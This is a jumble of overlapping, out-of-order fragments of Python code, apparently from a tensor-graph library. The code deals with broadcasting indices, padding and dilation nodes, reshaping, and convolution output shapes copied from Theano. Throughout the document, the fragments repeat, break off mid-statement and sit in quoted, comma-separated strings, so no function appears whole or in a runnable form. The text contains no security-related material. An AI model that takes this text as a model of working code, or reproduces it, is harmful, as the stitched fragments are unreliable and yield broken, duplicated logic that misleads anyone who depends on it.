Copied and simplified from theano (2020/11/08):", "a, b in zip(shp1[::-1], shp2[::-1]): if a == 1 or b == 1", "node_b.shape.index(s) all_ops.append(idx) return op1, op2, all_ops def _get_single_node_indices(node, shape=None): if node.shape == pm.DEFAULT_SHAPES[0]:", "pad_left def get_pad_tuple(padding, kernel): \"\"\"Common code to get the pad option Parameters ----------", "= [] for s in data.shape: idx = pm.index(0, s-1) src_indices.append(idx) # STEP", "len(pad_size) == 4: # return pad_size[0], pad_size[2], pad_size[1], pad_size[3] # else: # raise", "node.shape[idx]: indices.append(i) if tgt_shape != node.shape: for idx, i in enumerate(node.shape): if i", "- 1) a_idx.append(idx) b_idx.append(idx) out_idx.append(idx) elif node_a.shape[i] == 1: idx = pm.index(0, node_b.shape[i]", "* dilation + 1 if border_mode == \"full\": pad_l = pad_r = dil_kernel_shape", "'valid' or 'full'. If it is a tuple, its two (or three) elements", "if reverse: return tuple(list(reversed(x))) else: return tuple(x) def _get_indices(node, all_indices, tgt_shape): indices =", "convolution, its four (for 2D convolution) or five (for 3D convolution) elements must", "kernel, pad_val=0): assert len(data.shape) == 4 p_top, p_bottom, p_left, p_right = get_pad_tuple(pad_size, kernel)", "indices elif node_a.shape == pm.DEFAULT_SHAPES[0] and node_b.shape == pm.DEFAULT_SHAPES[0]: idx = format_idx([]) return", "if len(node.shape) > idx and tgt_shape[idx] == node.shape[idx]: indices.append(i) if tgt_shape != node.shape:", "if node_a.shape[i] != 1: idx = pm.index(0, node_a.shape[i] - 1) a_idx.append(idx) b_idx.append(idx) out_idx.append(idx)", "or 4\") # else: # assert isinstance(pad_size, int) # pad_h = pad_w =", "image_shape[0], image_shape[2:] convdim = len(image_shape) - 2 nkern, kshp = kernel_shape[0], kernel_shape[-convdim:] if", "bsize, imshp = image_shape[0], image_shape[2:] convdim = len(image_shape) - 2 nkern, kshp =", "return pad_top, pad_left, pad_h - pad_top, pad_w - pad_left def 
get_pad_tuple(padding, kernel): \"\"\"Common", "other shapes\" idx = node_b.shape.index(s) all_ops.append(idx) return op1, op2, all_ops def _get_single_node_indices(node, shape=None):", "string, or tuple of int. If it is a string, it must be", "shape on the considered axis. \"\"\" # Implicit dilated kernel shape dil_kernel_shape =", "pad_top = (pad_h + 1) // 2 pad_left = (pad_w + 1) //", "and width axis. Returns ------- output_shape: tuple of int corresponding to the output", "dilation on height and width axis. Returns ------- output_shape: tuple of int corresponding", "= 0 idx_offset = 1 add_dim = 0 for d in reversed(dc): idx", "* 2 # # pad_top = (pad_h + 1) // 2 # pad_left", "in node_a.shape: idx = node_a.shape.index(i) op2.append(op1[idx]) elif i == 1: op2.append(0) # all_ops.append(0)", "1) padded_out[(n_idx, c_idx, oh_idx, ow_idx)] = pad_val padded_out[(n_idx, c_idx, ih_idx + p_top, iw_idx", "axis. dilation: int. It must correspond to the dilation on the considered axis.", "pad_l if pad_r != 0: out_shp += pad_r if subsample != 1: out_shp", "image_shape - dil_kernel_shape if pad_l != 0: out_shp += pad_l if pad_r !=", "reverse=True): if reverse: return tuple(list(reversed(x))) else: return tuple(x) def _get_indices(node, all_indices, tgt_shape): indices", "pm.index(0, node_a.shape[i] - 1) a_idx.append(idx) b_idx.append(idx) out_idx.append(idx) elif node_a.shape[i] == 1: idx =", "def _get_single_node_indices(node, shape=None): if node.shape == pm.DEFAULT_SHAPES[0]: return tuple([]) else: if not shape:", "node_b.shape.index(s, start) b_idx[sidx] = idx b_map[s] = sidx for i in range(len(a_idx)): if", "the kernel shape. 
For a normal convolution, its four (for 2D convolution) or", "s in output.shape]) return indices def is_broadcastable(shp1, shp2): for a, b in zip(shp1[::-1],", "imshp[i], kshp[i], border_mode, subsample[i], filter_dilation[i] ) for i in range(len(subsample)) ) return (bsize,", "out_shp + 1 return out_shp def _get_conv_output_shape( image_shape, kernel_shape, border_mode, subsample, filter_dilation=(0, 0)", "indices, indices elif node_b.shape == pm.DEFAULT_SHAPES[0]: idx = format_idx([]) indices = _get_single_node_indices(node_a) return", "numpy as np def format_idx(x, reverse=True): if reverse: return tuple(list(reversed(x))) else: return tuple(x)", "undefined. kernel_shape: tuple of int corresponding to the kernel shape. For a normal", "ValueError(\"Size of padding can only be 2 or 4\") # else: # assert", ": int Padding size on top pad_left : int Padding size on left", "if padded_out.is_shape_finalized() and padded_out.shape != (1,): assert padded_shape == padded_out.shape, f\"Unequal shapes for", "# all_ops.append(0) else: idx = pm.index(0, i - 1) op2.append(idx) all_ops.append(idx) cnt +=", "i in range(len(subsample)) ) else: out_shp = tuple( _get_conv_shape_1axis( imshp[i], kshp[i], border_mode, subsample[i],", "Returns ------- pad_top : int Padding size on top pad_left : int Padding", "dil_kernel_shape if pad_l != 0: out_shp += pad_l if pad_r != 0: out_shp", "1) for s in shape]) return indices def _get_reduce_node_indices(a, b, output, axis): if", "0: out_shp += pad_r if subsample != 1: out_shp = out_shp // subsample", "from Theano (2020/11/08): https://github.com/Theano/Theano/blob/master/theano/tensor/nnet/abstract_conv.py Parameters ---------- image_shape: tuple of int corresponding to the", "dilation + 1 if border_mode == \"full\": pad_l = pad_r = dil_kernel_shape -", "== 1 a_idx[i] = 0 for i in range(len(b_idx)): if b_idx[i] is None:", "https://github.com/Theano/Theano/blob/master/theano/tensor/nnet/abstract_conv.py Parameters ---------- image_shape: 
tuple of int corresponding to the input image shape.", "pad_r if subsample != 1: out_shp = out_shp // subsample out_shp = out_shp", "(pad_h + 1) // 2 # pad_left = (pad_w + 1) // 2", "> idx and tgt_shape[idx] == node.shape[idx]: indices.append(i) if tgt_shape != node.shape: for idx,", "data.shape[d] def _get_indices_for_dim(x, dim): assert len(x.shape) < dim idx = pm.index(0, x.shape[dim] -", "- pad_top, pad_w - pad_left def pad_node(data: pm.Node, padded_out: pm.Node, pad_size, kernel, pad_val=0):", "tuple, its two (or three) elements respectively correspond to the padding on height", "pm.temp(name=name, shape=out_shape) padded[shape_idx] = 0 padded[(shape_idx[0])] = 0 # def get_pad_tuple(pad_size): # if", "b_map: start = b_map[s] sidx = node_b.shape.index(s, start) b_idx[sidx] = idx b_map[s] =", "tuple(list(reversed(x))) else: return tuple(x) def _get_indices(node, all_indices, tgt_shape): indices = [] if node.shape", "pm.Node, reshaped_out: pm.Node, shape: tuple, dim_combinations): assert np.prod(data.shape) == np.prod(shape) assert len(dim_combinations) ==", "0 for d in reversed(dc): idx = src_indices[d]*idx_offset + add_dim idx_offset = data.shape[d]", "depth) of the image. None where undefined. kernel_shape: tuple of int corresponding to", ": int Padding size on down. pad_right : int Padding size on right.", "op1.append(idx) all_ops.append(idx) cnt += 1 for i in node_b.shape: if i in node_a.shape:", "to the kernel shape on a given axis. border_mode: string or int. If", "pad_left def pad_node(data: pm.Node, padded_out: pm.Node, pad_size, kernel, pad_val=0): assert len(data.shape) == 4", "= [] nmap = {} reverse = True if not broadcastable: reverse =", "i == 1: op1.append(0) # all_ops.append(0) else: idx = pm.index(0, i - 1)", "pm.DEFAULT_SHAPES[0]: return tuple(indices) for idx, i in enumerate(all_indices): if len(node.shape) > idx and", ": int Padding size on right. 
\"\"\" # pad_h = pad_w = padding", "return padded_out def reshape_node(data: pm.Node, reshaped_out: pm.Node, shape: tuple, dim_combinations): assert np.prod(data.shape) ==", "start) b_idx[sidx] = idx b_map[s] = sidx for i in range(len(a_idx)): if a_idx[i]", "== \"full\": pad_l = pad_r = dil_kernel_shape - 1 elif border_mode == \"valid\":", "the image. None where undefined. kernel_shape: tuple of int corresponding to the kernel", "(pad_w + 1) // 2 return pad_top, pad_left, pad_h - pad_top, pad_w -", "= data[(n_idx, c_idx, ih_idx, iw_idx)] return padded_out def reshape_node(data: pm.Node, reshaped_out: pm.Node, shape:", "kernel) oh = data.shape[2] + p_top + p_bottom ow = data.shape[3] + p_left", "return idx def _dim_explicit(a_shp, dim): if dim is None: return dim if dim", "the output shape of convolution operation. Copied and simplified from Theano (2020/11/08): https://github.com/Theano/Theano/blob/master/theano/tensor/nnet/abstract_conv.py", "> len(node_b.shape): small_node = node_b lg_node = node_a nmap[\"small\"] = b_idx nmap[\"large\"] =", "node_c.shape: idx = pm.index(0, s - 1) out_idx.append(idx) if s in node_a.shape: start", "small_node = node_b lg_node = node_a nmap[\"small\"] = b_idx nmap[\"large\"] = a_idx else:", "out_idx = [] nmap = {} reverse = True if not broadcastable: reverse", "if i == 1: op1.append(0) # all_ops.append(0) else: idx = pm.index(0, i -", "# STEP 0: idx3*1 + 0 # STEP 1: idx3 + shape[3]* for", "else: return False return True # Use numpy broadcasting rules def _get_elem_indices(node_a, node_b,", "for a, b in zip(shp1[::-1], shp2[::-1]): if a == 1 or b ==", "s in data.shape: idx = pm.index(0, s-1) src_indices.append(idx) # STEP 0: idx3*1 +", "pad_l = pad_r = border_mode # In case of symbolic shape, we want", "pad_top : int Padding size on top pad_left : int Padding size on", "1 elif border_mode == \"valid\": pad_l = pad_r = 0 else: assert border_mode", "three elements respectively correspond to the subsampling on height and width (and 
possibly", "2 pad_top = (pad_h + 1) // 2 pad_left = (pad_w + 1)", "if a == 1 or b == 1 or a == b: pass", "= image_shape - dil_kernel_shape if pad_l != 0: out_shp += pad_l if pad_r", "() shape_idx = () for i in range(n): out_shape += ((var.shape[i] - 1)", "return False return True # Use numpy broadcasting rules def _get_elem_indices(node_a, node_b, node_c,", "a_map[s] sidx = node_a.shape.index(s, start) a_idx[sidx] = idx a_map[s] = sidx if s", "of output channels, number of input channels, height and width (and possibly depth)", "shape = node.shape indices = tuple([pm.index(0, s - 1) for s in shape])", "of int corresponding to the input image shape. Its four (or five) element", "Its four (or five) element must correspond respectively to: batch size, number of", "must correspond to the subsampling on the considered axis. dilation: int. It must", "return format_idx(a_idx, reverse), format_idx(b_idx, reverse), format_idx(out_idx, reverse) def dilate(var: pm.placeholder, strides, name=None): n", "s in node_b.shape: start = 0 if s in b_map: start = b_map[s]", "for i in range(-1, -len(lg_node.shape) - 1, -1): if len(small_node.shape) < abs(i): idx", "convolution operation. Copied and simplified from theano (2020/11/08): https://github.com/Theano/Theano/blob/master/theano/tensor/nnet/abstract_conv.py Parameters ---------- image_shape: int", "isinstance(pad_size, (tuple, list)): # if len(pad_size) == 2: # pad_h = pad_size[0] *", "on height and width (and possibly depth) axis. subsample: tuple of int. Its", "i in node_a.shape: idx = node_a.shape.index(i) op2.append(op1[idx]) elif i == 1: op2.append(0) #", "enumerate(all_indices): if len(node.shape) > idx and tgt_shape[idx] == node.shape[idx]: indices.append(i) if tgt_shape !=", "= is_broadcastable(node_a.shape, node_b.shape) a_idx = [] b_idx = [] out_idx = [] nmap", "reshaped_out: pm.Node, shape: tuple, dim_combinations): assert np.prod(data.shape) == np.prod(shape) assert len(dim_combinations) == len(shape)", "axis. 
Returns ------- output_shape: tuple of int corresponding to the output image shape.", "sidx for i in range(len(a_idx)): if a_idx[i] is None: assert node_a.shape[i] == 1", "pm.index(0, s-1) src_indices.append(idx) # STEP 0: idx3*1 + 0 # STEP 1: idx3", "1) * dilation + 1 if border_mode == \"full\": pad_l = pad_r =", "batch size, number of output channels, height and width of the image. \"\"\"", "TODO: Figure out what to do about multiple dimensions with the same value", ": tuple of int Conv kernel size Returns ------- pad_top : int Padding", "else: return tuple(x) def _get_indices(node, all_indices, tgt_shape): indices = [] if node.shape ==", "for s in output.shape]) return indices def is_broadcastable(shp1, shp2): for a, b in", "data.shape[0]-1) c_idx = pm.index(0, data.shape[1]-1) oh_idx = pm.index(0, oh-1) ih_idx = pm.index(0, data.shape[2]-1)", "== 1: idx = pm.index(0, node_b.shape[i] - 1) if zero_indices: a_idx.append(0) # TESTING", "pm.index(0, i - 1) op1.append(idx) all_ops.append(idx) cnt += 1 for i in node_b.shape:", "shape[3]* for dc in reversed(dim_combinations): idx = 0 idx_offset = 1 add_dim =", "code to get the pad option Parameters ---------- padding : int or str", "It must correspond to the dilation on the considered axis. Returns ------- out_shp:", "+ 1) // 2 # return pad_top, pad_left, pad_h - pad_top, pad_w -", "1) op2.append(idx) all_ops.append(idx) cnt += 1 if out_node.is_shape_finalized(): all_ops = [] for s", "== np.prod(shape) assert len(dim_combinations) == len(shape) src_indices = [] dst_indices = [] for", "three elements correspond respectively to the dilation on height and width axis. Returns", "int corresponding to the output image shape. 
Its four element must correspond respectively", "op2 = [] all_ops = [] for i in node_a.shape: if i ==", "format_idx(out_idx, reverse) def dilate(var: pm.placeholder, strides, name=None): n = len(var.shape) assert len(strides) ==", "node_a.shape[i] != 1: idx = pm.index(0, node_a.shape[i] - 1) a_idx.append(idx) b_idx.append(idx) out_idx.append(idx) elif", "i in range(-1, -len(lg_node.shape) - 1, -1): if len(small_node.shape) < abs(i): idx =", "\"valid\": pad_l = pad_r = 0 else: assert border_mode >= 0 pad_l =", "assert len(data.shape) == 4 p_top, p_bottom, p_left, p_right = get_pad_tuple(pad_size, kernel) oh =", "given axis. border_mode: string or int. If it is a string, it must", "out_shape += ((var.shape[i] - 1) * strides[i] + 1,) nz_indices += (pm.index(0, out_shape[i]", "_get_binop_idx(node_a, node_b, out_node): # TODO: Figure out what to do about multiple dimensions", "idx = pm.index(0, s - 1) out_idx.append(idx) if s in node_a.shape: start =", "format_idx([]) return idx, idx, idx elif node_a.shape == pm.DEFAULT_SHAPES[0]: idx = format_idx([]) indices", "b_idx for i in range(-1, -len(lg_node.shape) - 1, -1): if len(small_node.shape) < abs(i):", "= pm.index(0, s - 1) out_idx.append(idx) if s in node_a.shape: start = 0", "indices.append(i) if tgt_shape != node.shape: for idx, i in enumerate(node.shape): if i !=", "{} b_map = {} for s in node_c.shape: idx = pm.index(0, s -", "if node_a.shape == node_b.shape and node_c.shape == node_a.shape: indices = _get_single_node_indices(node_a) return indices,", "p_left, p_right = get_pad_tuple(pad_size, kernel) oh = data.shape[2] + p_top + p_bottom ow", "node_b.shape[i] - 1) if zero_indices: a_idx.append(0) # TESTING b_idx.append(idx) out_idx.append(idx) elif node_b.shape[i] ==", "If it is a string, it must be 'valid' or 'full'. 
If it", "node.shape indices = tuple([pm.index(0, s - 1) for s in shape]) return indices", "4: # return pad_size[0], pad_size[2], pad_size[1], pad_size[3] # else: # raise ValueError(\"Size of", "node_b.shape[i] == 1: idx = pm.index(0, node_a.shape[i] - 1) a_idx.append(idx) if zero_indices: b_idx.append(0)", "def get_pad_tuple(pad_size): # if isinstance(pad_size, (tuple, list)): # if len(pad_size) == 2: #", "pm.DEFAULT_SHAPES[0]: idx = format_idx([]) indices = _get_single_node_indices(node_b) return idx, indices, indices elif node_b.shape", "tuple, dim_combinations): assert np.prod(data.shape) == np.prod(shape) assert len(dim_combinations) == len(shape) src_indices = []", "of input channels, height and width (and possibly depth) of the image. None", "indices elif node_b.shape == pm.DEFAULT_SHAPES[0]: idx = format_idx([]) indices = _get_single_node_indices(node_a) return indices,", "= pm.index(0, i - 1) op2.append(idx) all_ops.append(idx) cnt += 1 if out_node.is_shape_finalized(): all_ops", "elif i == 1: op2.append(0) # all_ops.append(0) else: idx = pm.index(0, i -", "= [] op2 = [] all_ops = [] for i in node_a.shape: if", "s in node_b.shape, f\"Output shape value {s} not in other shapes\" idx =", "node_a.shape[i] == 1: idx = pm.index(0, node_b.shape[i] - 1) if zero_indices: a_idx.append(0) #", "indices = _get_single_node_indices(node_a) return indices, idx, indices if len(node_a.shape) > len(node_b.shape): small_node =", "src_indices[d]*idx_offset + add_dim idx_offset = data.shape[d] def _get_indices_for_dim(x, dim): assert len(x.shape) < dim", "== n out_shape = () nz_indices = () shape_idx = () for i", "in range(-1, -len(lg_node.shape) - 1, -1): if len(small_node.shape) < abs(i): idx = pm.index(0,", "== b: pass else: return False return True # Use numpy broadcasting rules", "+ p_top, iw_idx + p_left)] = data[(n_idx, c_idx, ih_idx, iw_idx)] return padded_out def", "get_pad_tuple(pad_size, kernel) oh = data.shape[2] + p_top + p_bottom ow = data.shape[3] +", "int 
Padding size on top pad_left : int Padding size on left pad_down", "len(x.shape) < dim idx = pm.index(0, x.shape[dim] - 1) return idx def _dim_explicit(a_shp,", "right. \"\"\" # pad_h = pad_w = padding * 2 pad_h = padding[0]", "in node_b.shape: if i in node_a.shape: idx = node_a.shape.index(i) op2.append(op1[idx]) elif i ==", "get_pad_tuple(pad_size): # if isinstance(pad_size, (tuple, list)): # if len(pad_size) == 2: # pad_h", "iw_idx)] return padded_out def reshape_node(data: pm.Node, reshaped_out: pm.Node, shape: tuple, dim_combinations): assert np.prod(data.shape)", "= format_idx([]) return idx, idx, idx elif node_a.shape == pm.DEFAULT_SHAPES[0]: idx = format_idx([])", "and width (and possibly depth) axis. filter_dilation: tuple of int. Its two or", "to do about multiple dimensions with the same value cnt = 0 op1", "\"\"\" bsize, imshp = image_shape[0], image_shape[2:] convdim = len(image_shape) - 2 nkern, kshp", "\"\"\" # pad_h = pad_w = padding * 2 pad_h = padding[0] *", "all_ops.append(idx) else: assert s in node_b.shape, f\"Output shape value {s} not in other", "kernel_shape, border_mode, subsample, filter_dilation=(0, 0) ): \"\"\"This function compute the output shape of", "channels, height and width (and possibly depth) of the kernel. For an unshared", "for i in range(len(b_idx)): if b_idx[i] is None: assert node_b.shape[i] == 1 b_idx[i]", "all_ops.append(idx) return op1, op2, all_ops def _get_single_node_indices(node, shape=None): if node.shape == pm.DEFAULT_SHAPES[0]: return", "pad_h = pad_w = pad_size * 2 # # pad_top = (pad_h +", "s in a_map: start = a_map[s] sidx = node_a.shape.index(s, start) a_idx[sidx] = idx", "kernel_shape: int Corresponds to the kernel shape on a given axis. 
border_mode: string", "+ 1) // 2 # pad_left = (pad_w + 1) // 2 #", "is None: assert node_a.shape[i] == 1 a_idx[i] = 0 for i in range(len(b_idx)):", "in b_map: start = b_map[s] sidx = node_b.shape.index(s, start) b_idx[sidx] = idx b_map[s]", "three) elements respectively correspond to the padding on height and width (and possibly", "out_node.shape: if s in node_a.shape: idx = node_a.shape.index(s) all_ops.append(idx) else: assert s in", "to the dilation on the considered axis. Returns ------- out_shp: int corresponding to", "broadcastable: reverse = False a_idx = [None] * len(node_a.shape) b_idx = [None] *", "correspond respectively to: batch size, number of input channels, height and width (and", "if isinstance(pad_size, (tuple, list)): # if len(pad_size) == 2: # pad_h = pad_size[0]", "node_b.shape and node_c.shape == node_a.shape: indices = _get_single_node_indices(node_a) return indices, indices, indices elif", "in a_map: start = a_map[s] sidx = node_a.shape.index(s, start) a_idx[sidx] = idx a_map[s]", "as pm import numpy as np def format_idx(x, reverse=True): if reverse: return tuple(list(reversed(x)))", "element must correspond respectively to: batch size, number of output channels, height and", "0 op1 = [] op2 = [] all_ops = [] for i in", "_get_reduce_node_indices(a, b, output, axis): if output.shape == pm.DEFAULT_SHAPES[0]: return tuple([]) else: if not", "to the padding on height and width (and possibly depth) axis. subsample: tuple", "operation. 
Copied and simplified from theano (2020/11/08): https://github.com/Theano/Theano/blob/master/theano/tensor/nnet/abstract_conv.py Parameters ---------- image_shape: int Corresponds", "idx = node_a.shape.index(s) all_ops.append(idx) else: assert s in node_b.shape, f\"Output shape value {s}", "b_idx nmap[\"large\"] = a_idx else: small_node = node_a lg_node = node_b nmap[\"small\"] =", "idx = format_idx([]) indices = _get_single_node_indices(node_a) return indices, idx, indices if len(node_a.shape) >", "2: # pad_h = pad_size[0] * 2 # pad_w = pad_size[1] * 2", "and width of the kernel. None where undefined. border_mode: string, or tuple of", "1) if zero_indices: a_idx.append(0) # TESTING b_idx.append(idx) out_idx.append(idx) elif node_b.shape[i] == 1: idx", "pm.index(0, i - 1) op2.append(idx) all_ops.append(idx) cnt += 1 if out_node.is_shape_finalized(): all_ops =", "+ shape[3]* for dc in reversed(dim_combinations): idx = 0 idx_offset = 1 add_dim", "dim_combinations): assert np.prod(data.shape) == np.prod(shape) assert len(dim_combinations) == len(shape) src_indices = [] dst_indices", "0 if s in b_map: start = b_map[s] sidx = node_b.shape.index(s, start) b_idx[sidx]", "pad_val padded_out[(n_idx, c_idx, ih_idx + p_top, iw_idx + p_left)] = data[(n_idx, c_idx, ih_idx,", ": int or str Padding size, or ['VALID', 'SAME'] kernel : tuple of", "c_idx, ih_idx, iw_idx)] return padded_out def reshape_node(data: pm.Node, reshaped_out: pm.Node, shape: tuple, dim_combinations):", "for s in node_c.shape: idx = pm.index(0, s - 1) out_idx.append(idx) if s", "* strides[i] + 1,) nz_indices += (pm.index(0, out_shape[i] - 1, stride=strides[i]),) shape_idx +=", "(kernel_shape - 1) * dilation + 1 if border_mode == \"full\": pad_l =", "respectively to: batch size, number of output channels, height and width of the", "= [] for i in node_a.shape: if i == 1: op1.append(0) # all_ops.append(0)", "given axis. 
kernel_shape: int Corresponds to the kernel shape on a given axis.", "int corresponding to the kernel shape. For a normal convolution, its four (for", "int Corresponds to the input image shape on a given axis. kernel_shape: int", "shape value {s} not in other shapes\" idx = node_b.shape.index(s) all_ops.append(idx) return op1,", "= {} for s in node_c.shape: idx = pm.index(0, s - 1) out_idx.append(idx)", "pad_top, pad_w - pad_left def get_pad_tuple(padding, kernel): \"\"\"Common code to get the pad", "0: out_shp += pad_l if pad_r != 0: out_shp += pad_r if subsample", "on height and width (and possibly depth) axis. filter_dilation: tuple of int. Its", "zero_indices=True): broadcastable = is_broadcastable(node_a.shape, node_b.shape) a_idx = [] b_idx = [] out_idx =", "= node_b.shape.index(s) all_ops.append(idx) return op1, op2, all_ops def _get_single_node_indices(node, shape=None): if node.shape ==", "[] all_ops = [] for i in node_a.shape: if i == 1: op1.append(0)", "a_idx nmap[\"large\"] = b_idx for i in range(-1, -len(lg_node.shape) - 1, -1): if", "[None] * len(node_a.shape) b_idx = [None] * len(node_b.shape) a_map = {} b_map =", "= 0 padded[(shape_idx[0])] = 0 # def get_pad_tuple(pad_size): # if isinstance(pad_size, (tuple, list)):", "padding[0] * 2 pad_w = padding[1] * 2 pad_top = (pad_h + 1)", "convolution) or five (for 3D convolution) elements must correspond respectively to : number", "RuntimeError(f\"Unable to broadcast indices:\\n\" f\"{node_a.name}: {node_a.shape}\\n\" f\"{node_b.name}: {node_b.shape}\\n\") return format_idx(a_idx, reverse), format_idx(b_idx, reverse),", "strides[i] + 1,) nz_indices += (pm.index(0, out_shape[i] - 1, stride=strides[i]),) shape_idx += (pm.index(0,", "to : number of output channels, number of input channels, height and width", "axis. 
\"\"\" # Implicit dilated kernel shape dil_kernel_shape = (kernel_shape - 1) *", "True # Use numpy broadcasting rules def _get_elem_indices(node_a, node_b, node_c, zero_indices=True): broadcastable =", "if output.shape == pm.DEFAULT_SHAPES[0]: return tuple([]) else: if not output.shape: raise RuntimeError indices", "size, or ['VALID', 'SAME'] kernel : tuple of int Conv kernel size Returns", "int Conv kernel size Returns ------- pad_top : int Padding size on top", "2 pad_w = padding[1] * 2 pad_top = (pad_h + 1) // 2", "oh = data.shape[2] + p_top + p_bottom ow = data.shape[3] + p_left +", "format_idx(x, reverse=True): if reverse: return tuple(list(reversed(x))) else: return tuple(x) def _get_indices(node, all_indices, tgt_shape):", "+ dim return dim def _get_conv_shape_1axis( image_shape, kernel_shape, border_mode, subsample, dilation=1 ): \"\"\"This", "node_a.shape.index(i) op2.append(op1[idx]) elif i == 1: op2.append(0) # all_ops.append(0) else: idx = pm.index(0,", "1) for s in output.shape]) return indices def is_broadcastable(shp1, shp2): for a, b", "* len(node_a.shape) b_idx = [None] * len(node_b.shape) a_map = {} b_map = {}", "data.shape[3] + p_left + p_right padded_shape = (data.shape[0], data.shape[1], oh, ow) if padded_out.is_shape_finalized()", "image shape. Its four (or five) element must correspond respectively to: batch size,", "if s in node_a.shape: start = 0 if s in a_map: start =", "def dilate(var: pm.placeholder, strides, name=None): n = len(var.shape) assert len(strides) == n out_shape", "two (or three) elements respectively correspond to the padding on height and width", "four element must correspond respectively to: batch size, number of output channels, height", "subsample: tuple of int. 
Its two or three elements respectively correspond to the", "idx3 + shape[3]* for dc in reversed(dim_combinations): idx = 0 idx_offset = 1", "assert node_b.shape[i] == 1 b_idx[i] = 0 else: if node_a.shape == node_b.shape and", "padding[1] * 2 pad_top = (pad_h + 1) // 2 pad_left = (pad_w", "None where undefined. kernel_shape: tuple of int corresponding to the kernel shape. For", "out_shape = () nz_indices = () shape_idx = () for i in range(n):", "# pad_h = pad_w = padding * 2 pad_h = padding[0] * 2", "and simplified from Theano (2020/11/08): https://github.com/Theano/Theano/blob/master/theano/tensor/nnet/abstract_conv.py Parameters ---------- image_shape: tuple of int corresponding", "c_idx, ih_idx + p_top, iw_idx + p_left)] = data[(n_idx, c_idx, ih_idx, iw_idx)] return", "raise ValueError(\"Size of padding can only be 2 or 4\") # else: #", "= tuple([pm.index(0, s - 1) for s in shape]) return indices def _get_reduce_node_indices(a,", "node_a.shape[i] - 1) a_idx.append(idx) if zero_indices: b_idx.append(0) # TESTING out_idx.append(idx) else: raise RuntimeError(f\"Unable", "if s in node_a.shape: idx = node_a.shape.index(s) all_ops.append(idx) else: assert s in node_b.shape,", "correspond to the padding on height and width (and possibly depth) axis. 
subsample:", "indices def is_broadcastable(shp1, shp2): for a, b in zip(shp1[::-1], shp2[::-1]): if a ==", "op1 = [] op2 = [] all_ops = [] for i in node_a.shape:", "return tuple(x) def _get_indices(node, all_indices, tgt_shape): indices = [] if node.shape == pm.DEFAULT_SHAPES[0]:", "_get_conv_output_shape( image_shape, kernel_shape, border_mode, subsample, filter_dilation=(0, 0) ): \"\"\"This function compute the output", "be 2 or 4\") # else: # assert isinstance(pad_size, int) # pad_h =", "= pm.index(0, node_b.shape[i] - 1) if zero_indices: a_idx.append(0) # TESTING b_idx.append(idx) out_idx.append(idx) elif", "b, output, axis): if output.shape == pm.DEFAULT_SHAPES[0]: return tuple([]) else: if not output.shape:", "s in b_map: start = b_map[s] sidx = node_b.shape.index(s, start) b_idx[sidx] = idx", "= idx a_map[s] = sidx if s in node_b.shape: start = 0 if", "(for 2D convolution) or five (for 3D convolution) elements must correspond respectively to", "two or three elements respectively correspond to the subsampling on height and width", "kernel shape on a given axis. border_mode: string or int. If it is", "def _dim_explicit(a_shp, dim): if dim is None: return dim if dim < 0:", "in range(len(b_idx)): if b_idx[i] is None: assert node_b.shape[i] == 1 b_idx[i] = 0", "def get_pad_tuple(padding, kernel): \"\"\"Common code to get the pad option Parameters ---------- padding", "pad_right : int Padding size on right. 
\"\"\" # pad_h = pad_w =", "elements respectively correspond to the padding on height and width (and possibly depth)", "in data.shape: idx = pm.index(0, s-1) src_indices.append(idx) # STEP 0: idx3*1 + 0", "pad_left = (pad_w + 1) // 2 # return pad_top, pad_left, pad_h -", "# Use numpy broadcasting rules def _get_elem_indices(node_a, node_b, node_c, zero_indices=True): broadcastable = is_broadcastable(node_a.shape,", "= data.shape[2] + p_top + p_bottom ow = data.shape[3] + p_left + p_right", "f\"{node_a.name}: {node_a.shape}\\n\" f\"{node_b.name}: {node_b.shape}\\n\") return format_idx(a_idx, reverse), format_idx(b_idx, reverse), format_idx(out_idx, reverse) def dilate(var:", "out_shape[i] - 1),) padded = pm.temp(name=name, shape=out_shape) padded[shape_idx] = 0 padded[(shape_idx[0])] = 0", "< 0: dim = len(a_shp) + dim return dim def _get_conv_shape_1axis( image_shape, kernel_shape,", "= node_a.shape.index(s) all_ops.append(idx) else: assert s in node_b.shape, f\"Output shape value {s} not", "its six channels must correspond to : number of output channels, height and", "len(node_a.shape) b_idx = [None] * len(node_b.shape) a_map = {} b_map = {} for", "must correspond to the dilation on the considered axis. Returns ------- out_shp: int", "image shape on a given axis. kernel_shape: int Corresponds to the kernel shape", "lg_node = node_b nmap[\"small\"] = a_idx nmap[\"large\"] = b_idx for i in range(-1,", "pad_left : int Padding size on left pad_down : int Padding size on", "idx, idx, idx elif node_a.shape == pm.DEFAULT_SHAPES[0]: idx = format_idx([]) indices = _get_single_node_indices(node_b)", "1, -1): if len(small_node.shape) < abs(i): idx = pm.index(0, lg_node.shape[i] - 1) nmap[\"large\"].append(idx)", "RuntimeError indices = tuple([pm.index(0, s - 1) for s in output.shape]) return indices", "possibly depth) of the kernel. 
For an unshared 2D convolution, its six channels", "!= 0: out_shp += pad_l if pad_r != 0: out_shp += pad_r if", "on top pad_left : int Padding size on left pad_down : int Padding", "pad_l = pad_r = dil_kernel_shape - 1 elif border_mode == \"valid\": pad_l =", "all_ops.append(0) else: idx = pm.index(0, i - 1) op1.append(idx) all_ops.append(idx) cnt += 1", "1 return out_shp def _get_conv_output_shape( image_shape, kernel_shape, border_mode, subsample, filter_dilation=(0, 0) ): \"\"\"This", "'SAME'] kernel : tuple of int Conv kernel size Returns ------- pad_top :", "_dim_explicit(a_shp, dim): if dim is None: return dim if dim < 0: dim", "pad_r = 0 else: assert border_mode >= 0 pad_l = pad_r = border_mode", "True if not broadcastable: reverse = False a_idx = [None] * len(node_a.shape) b_idx", "to the output image shape on the considered axis. \"\"\" # Implicit dilated", "c_idx, oh_idx, ow_idx)] = pad_val padded_out[(n_idx, c_idx, ih_idx + p_top, iw_idx + p_left)]", "== 2: # pad_h = pad_size[0] * 2 # pad_w = pad_size[1] *", "b_idx[i] = 0 else: if node_a.shape == node_b.shape and node_c.shape == node_a.shape: indices", "shape. 
